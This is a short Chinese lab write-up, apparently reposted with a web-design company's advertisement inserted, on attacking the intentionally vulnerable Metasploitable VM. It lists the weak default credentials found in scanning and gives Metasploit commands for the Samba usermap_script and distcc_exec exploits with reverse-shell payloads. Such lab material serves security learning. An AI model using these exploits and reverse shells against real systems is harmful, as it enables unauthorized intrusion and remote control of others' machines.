Samba&distcc漏洞
漏洞测试确实是可以的 当时把文章copy下来进行再进行测试。但是没有copy到图片,实验是成功了,但是没有那么直观。
创新互联长期为近千家客户提供的网站建设服务,团队从业经验10年,关注不同地域、不同群体,并针对不同对象提供差异化的产品和服务;打造开放共赢平台,与合作伙伴共同营造健康的互联网生态环境。为甘井子企业提供专业的成都做网站、成都网站制作,甘井子网站改版等技术服务。拥有十多年丰富建站经验和众多成功案例,为您定制开发。
使用metasploit
对metasploitable 靶服务器进行***
metasploitable 是ubuntu8.0的版本
neuss扫描到漏洞
139端口可以获取该系统主机名为“METASPLOITABLE”,注释“metasploitable server (Samba 3.0.20-Debian)”;
系统存在弱口令,用户user、msfadmin密码与用户名一样,使用net use命令能够建立连接查看共享资源。ftp开放版本信息 ProFTPD 1.3.1 Server (Debian),user这个用户在ftp中也可以使用;
telnet服务开放,可确定该系统为Ubuntu 8.04,用户user、msfadmin可以登录,并获得相应权限。如果不存在弱口令,通过截获该telnet数据也能获取用户口令
一个distcc漏洞
一个samba 共享服务漏洞
msf对靶服务器的工具
smb-samba 共享服务
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse
set rhost (ip address)
set lhost (ip address)
exploit
use exploit/unix/misc/distcc_exec
set payload cmd/unix/reverse_perl
set rhost (ip address)
set lhost (ip address)
exploit
distcc 成功 但是没有root的权限
标题名称:Samba&distcc漏洞
分享地址:http://hbruida.cn/article/gdoosj.html